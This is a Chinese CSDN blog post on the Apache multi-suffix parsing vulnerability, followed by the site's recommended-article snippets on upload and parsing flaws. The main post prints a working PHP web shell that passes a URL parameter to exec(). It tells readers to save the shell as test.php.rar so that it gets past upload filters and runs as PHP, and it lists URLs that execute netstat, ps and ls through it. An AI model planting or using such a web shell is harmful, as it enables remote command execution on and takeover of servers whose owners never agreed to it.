关于php apache后缀漏洞 附测试代码

最新推荐文章于 2024-01-23 17:26:25 发布
最新推荐文章于 2024-01-23 17:26:25 发布
阅读量691 收藏
点赞数
文章标签: apache 测试 php input web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuicg/article/details/1656796
版权
关于php apache后缀漏洞 附测试代码

 很致命的漏洞,如果你的程序有这方面的问题。

主要危害是带上传功能的应用。
如果你是把上传的文件统一改名了还好。

如果没有改名。那么就危险拉。
如果他上传jpg,gif,zip还好说拉。如果他上一个 xxx.php.rar 的文件那么就轻松拿到你的web sheel 拉 。

QUOTE:
<?
if($_GET[comm]!='')
{
        exec($_GET[comm],$re);
        foreach($re as $v)
                echo $v.'<br>';
}
else
        exit('Please input command...');
?>

以上代码另存为test.php.rar

测试代码:
http://localhost:/test.php.rar?comm=netstat -n

http://localhost:/test.php.rar?comm=ps -A

http://localhost:/test.php.rar?comm=ls
shuicg
关注
Apache后缀名解析漏洞分析和防御方法
09-15
### Apache后缀名解析漏洞分析 #### 漏洞背景 Apache是一款广泛使用的Web服务器软件,在互联网上承载了大量的网站和应用。由于其高度可定制性和稳定性,成为了许多组织和个人建站的首选。然而,如同任何复杂的系统...
Apache文件解析漏洞详解
永远是少年
10-07 1502
今天继续给大家介绍渗透测试相关知识,本文主要内容是Apache文件解析漏洞详解。 一、漏洞简介 二、Vulhub漏洞环境启动 三、漏洞实战
Apache两个解析漏洞复现及防御方法
阿道夫的博客
01-28 3433
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
测试开发必备技能:安全测试漏洞靶场实战
最新发布
测试官
01-23 844
安全在互联网行业,是一个对专业性较强,且敏感的一个领域,所谓"一念成佛,一念入魔",安全技术利用得当,可以为你的产品、网站更好的保驾护航,而如果心术不正,利用安全漏洞去做一些未法牟利,则容易造成承担不必要的违法责任。
PHP 代码审计常规漏洞的步骤和技巧
weixin_62369433的博客
04-12 579
在这个数字化时代,安全已经成为最重要的关键词之一。对于开发人员和安全专业人员来说,代码审计是确保应用程序和服务安全性的一项重要任务。通过审计,可以发现并修复各种类型的漏洞,包括 SQL 注入、XSS、CSRF、文件上传漏洞等。愿你们在代码审计的道路上勇往直前,不断学习和探索,找到应用程序中的所有漏洞,并将其修复,为我们的数字世界带来更加安全可靠的服务。
Web安全】文件上传漏洞
RexHa的博客
12-04 3710
目录1. 文件上传漏洞概述1.1 FCKEditor文件上传漏洞1.2 绕过文件上传检查功能2. 功能还是漏洞2.1 Apache文件解析2.2 IIS文件解析2.3 PHP CGI路径解析2.4 利用上传文件钓鱼 3. 设计安全的文件上传功能文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务端命令的能力。应用:例如上传一张图片、分享一段视频、论坛发帖时件、发邮件时件……文件上传后导致的安全问题一般有:FCKEditor是一款非常流行的富文本编辑器,其上传文件的功能能
php文件后缀不强制为.php的实操方法
10-16
总结来说,PHP文件后缀不必强制使用.php是一种可行的技术方法,它可以帮助开发者提高代码的安全性、保护源代码不被轻易下载,同时也支持根据特殊需求定制文件类型。但在实际操作中,开发者需要注意服务器配置的正确...
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
### 渗透测试上传漏洞经典靶场学习-upload-labs #### 第一关:绕过前端JS限制 **漏洞概要**:此关卡中的漏洞主要体现在仅在前端JavaScript脚本中进行文件类型的简单验证,而服务器端(后端)并未进行任何有效的...
Web中间件常见漏洞总结.pdf
06-14
Web中间件是企业级Web应用程序运行的基础环境,常见的中间件产品包括IIS、Apache、Tomcat等。中间件的安全问题常常成为黑客攻击的目标,因此深入理解和掌握Web中间件常见漏洞的知识对于网络安全防护至关重要。下面,...
Web安全 PHP反序列化漏洞测试.(可以 防止恶意用户利用漏洞
网络安全领域___专研者.
03-25 4559
PHP反序列化漏洞的 概括: 开发的程序员 没有对用户输入的序列化字符串做一个严格检测,导致恶意的用户可以控制反序列化的一个过程,因此导致XSS漏洞,代码执行,SQT注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。在进行反序列化的时候就有可能触发对象中的一些魔术方法。
php网站漏洞检测safe3
03-14
safe3 一个php网站漏洞检测的工具 感觉很好用 我用它跑了我自己开发过网站,可以快速地帮助开发人员分析出程序存在的漏洞,便于有目标性的优化程序。
vulhub-httpd-apache_parsing_vulnerability
Ronin_qianmo的博客
07-27 441
1、漏洞描述 在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。 2、漏洞原理 Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件: AddType text/html .html AddLanguage zh-CN .cn 其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文
httpd已复现漏洞
qq_61142406的博客
05-28 782
CVE-2017-15715: 2.4.0~2.4.29 00截断,后缀名后面加0A,1.php后面加上一个空格,然后双击空格,右边出现hex进制,然后改成0A CVE-2021-41773: 目录穿越,Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越的目录,配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器。 文件读取 payl
网站被攻击怎么处理 phpstudy存在后门漏洞
网站安全专家
09-27 3611
phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。第一时间保障客户的网站安全,以及服务器的安全稳定运行。关于该漏洞的详...
文件解析漏洞总结-Apache
热门推荐
若水斋
08-10 2万+
本文详细论述、测试Apache的三种文件解析漏洞:多后缀名、罕见后缀和利用.htaccess
apache php解析漏洞,apache解析漏洞及修复方法
weixin_32789783的博客
03-19 489
apache对文件后缀的解析方法是”.”后边的都是后缀,从后到前,如果后缀无效,会解析前一个,例如 1.php.x1.x2.x3 他会先解析x3,不存在解析x2,不存在解析x1,都不存在就只能解析php了。如图:定义后缀,但是不可能所有后缀都定义吧?x1.x2.x3可以换成任意后缀例如1.php.a,.a没有定义,apache不明白a是什么后缀,就向前解析,也就是去解析php。用伪静态能解决这个问...
Apache漏洞—多后缀名解析、目录遍历和(CVE-2017-15715)
今天也要加油鸭
03-25 5803
文章目录一、Apache httpd 多后缀解析漏洞漏洞原理漏洞复现漏洞修复 Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。 一、Apache h...
利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单
大方子
08-25 2万+
我在代码审计知识星球里提到了Apache最新的一个解析漏洞(CVE-2017-15715): 除了帖子中说到的利用方法,我们还可以利用这个漏洞来绕过上传黑名单限制。 目标环境 比如,目标存在一个上传的逻辑:   &lt;?php if(isset($_FILES['file'])) { $name = basename($_POST['name']); $ext =...
php+apache fckeditor漏洞利用
黑面小窝
11-20 7115
1.发现fckeditor目录存在,存在以下链接: FCKeditor/editor/filemanager/upload/test.html FCKeditor/editor/filemanager/browser/default/connectors/test.html FCKeditor/editor/filemanager/browser/default/browser.html?T
upload-labs靶场通关攻略:PHP文件上传漏洞利用
在网络安全领域,特别是针对Web应用程序的安全测试,文件上传漏洞是一个常见的攻击点。Upload-labs靶场提供了一系列关卡,模拟了不同的文件上传防护机制,让测试者练习如何绕过这些防护。下面我们将详细分析每个关卡...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值